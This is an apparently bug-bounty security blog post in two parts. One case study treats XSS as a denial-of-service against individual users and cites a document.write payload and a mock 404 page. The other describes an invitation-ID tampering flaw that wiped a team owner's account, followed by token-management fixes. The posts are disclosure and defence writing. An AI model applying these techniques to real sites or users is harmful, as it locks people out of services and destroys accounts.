DoS: Back From The Dead?

Stay updated on FogMarks

Happy 2018!

January is the perfect after-holidays time to point out our goals for the next year. And to lose some weight (because of the holidays), of course!
FogMarks always aims to write the most interesting case-studies about the latest “hot” vulnerabilities, and 2018 is going to be super-exciting!

So, finally after a long break here we are again discussing a vulnerability that many though was dead: the Denial of Service attack.
I’ve heard a lot of statements in the sec community regarding DoS attacks and vulnerabilities. Most of them addressed DoS as “an attack of the past”, as a vulnerability that cannot affect the server side anymore, thanks to companies such as Cloudflare, Nexusguard and other load-balancing service providers.

As a result, a lot of bug bounty programs aren’t accepting DoS vulnerability submissions, and sometimes even forbid the researcher from testing, in fear of an affect on the system’s stability and user experience. And their right, sort of.

But- who said that a DoS attack has to be on the server? It takes two to tango – if the server is now “protected” against DoS attacks (by an anti-DoS/DDoS service), who is protecting the user?

Let me elaborate on that: Companies are too busy preventing DoS attacks on their servers, that they are forgetting that DoS attacks are possible against users as well. A Denial of Service attack, to my definition, is any attack which prevents a user from accessing a resource or a service from the server. This can be done by directly attacking the server – like trying to make him “shutdown” from over-traffic – or by directly attacking the users.

Actually, attacking the users is the more easy way to do it. In addition, in a lot of cases the company won’t even know that the user was attacked until the user will contact the company and say “Hey, I cannot access X”.

You all know what I’m about to say now. Which type of vulnerability can cause a DoS attack super fast to a specific user? An XSS of course!

Sending or planting an XSS payload which disrupts a certain service onto specific user/users causes a severe denial of service/resource to that user or users. This payload can be a simple redirection outside of the site, or even “document.write(”);” that is simply printing a white page or a misleading page.

A certain very known commercial company, which hasn’t allowed us to mention it’s name yet suffered from that exact attack.
When I first started to research their main product, I was told not to DoS or DDoS their servers, “because we have an anti-DDoS mechanisms that are preventing that, and we think DoS attack belongs to the past”. Of course that DoS from a different angle was the next thing I have done on their product 🙂

I come to understand that an XSS payload can be sent directly to a specific user or to a users group. That XSS was “universal” – it was executing from any page of the site, because of the messaging feature that appeared in any page. I planted an XSS payload which simply echoed a mock “404 Not Found” page onto the page. To prove that this issue was indeed severe, me and the head of their security response team have test the attack on the production site, against one of the developers. He response (“WTF? What happened to the site?”) was hilarious.

Conclusion
Although most of the modern servers are now vulnerable to DoS and DDoS attacks thanks to smart load balancing and malicious requests blocking services, the user is still out there – unarmed and unprotected. You should always treat any type of attack that can prevent an action from being fulfilled as a major security issue, regardless of the type of the vulnerability.

Happy & Successful 2018!

And The King Goes Down


Tokens are great. Well, sometimes.

Today’s case-study will discuss the importance of a Token Manager software.
Well, every site which allows login normally will use a token on each of the ‘critical’ actions it allows users to do. Facebook, for example, automatically adds a token at the end of any link a user provide, and even their own links! This mechanism is called ‘Linkshim’ and it is the primary reason why you never hear about Facebook open redirects, CSRFs or clickjacking (yeah yeah I know they simply not allowing iframes to access them, I’ll write a whole case-study about that in the near future).
Facebook’s method is pretty simple – if a link is being added to the page – add a token at the end of it. The token, of course, should allow only for the same logged-in user to access the URL, and there should be a token count to restrict the number of times a token should be used (hint- only once).

But what happens when tokens are being managed in a wrong approach?

A very famous security company, which still hasn’t allowed us to publish it’s name, allowed users to create a team. When a user creates a team, he is the owner of the team – he has the ‘highest’ role, and he basically controls the whole team actions and options – he can change the team’s name, invite new people to the team, change roles of people in the team and so on.

The team offers the following roles: Owner, Administrator and some other minor non-important roles. Only the owner and administrators of the team are able to invite new users to the team. An invitation can be sent only to person who is not on the team and does not have an account on the company’s web. When the receiver will open the mail he will be redirected to a registration page of the company, and then will be added to the team with the role the Owner/Admin set.

When I first looked at the team options I noticed that after the owner or an admin invites other people to the team via email, he can resend the invitation in case the invited user missed it or deleted it by accident. The resend options was a link at the side of each invitation. Clicking the link created a POST request to a certain ‘Invitation manager’ page, and passed it the invitation ID.

That’s where I started thinking. Why passing the invitation ID as is? Why not obfuscate it or at least use a token for some sort of validation?

Well, that’s where the gold is, baby. Past invitation IDs were not deleted. That means that invitations that were approved were still present on the database, and still accessible.

By changing the passed invitation ID parameter to the ‘first’ invitation ID of the Owner – It was possible to resend an invitation to him.
At first I laughed and said ‘Oh well, how much damage could it make besides spam the owner a bit?’. But I was wrong. Very wrong.

When the system detected that an invitation to the owner was sent, it removed the owner from his role. But further more – remember that I said that sending an invitation sends the receiver a registration page according to his email address? The system also wiped the owner’s account – his private details, and most important – his credentials. This caused the whole account of the owner to be blocked. A classic DoS.

So how can we prevent unwanted actions to be performed on our server? That’s kind of easy.
First, lets attach an authenticity token to each action. The authenticity token must be generated specifically and individually to each specific user.
Second, like milk and cheese – lets attach an expiration date for the token. 2 Minutes expiration date is the fair time to allow our token to be used by the user.
And last, lets delete used tokens from the accessible tokens mechanism. A token should be used only once. If a user has got a problem with that – generate a few tokens for him.

For conclusion,
This case-study presented a severe security issue that was discovered in the code of some very famous security company.
The security issue could have been prevented by following three simple principals – 1) Attaching a token to each action that is being performed by a user. 2) Setting a rational extirpation time for each token. 3) And most importantly – correctly managing the tokens and deleting used ones.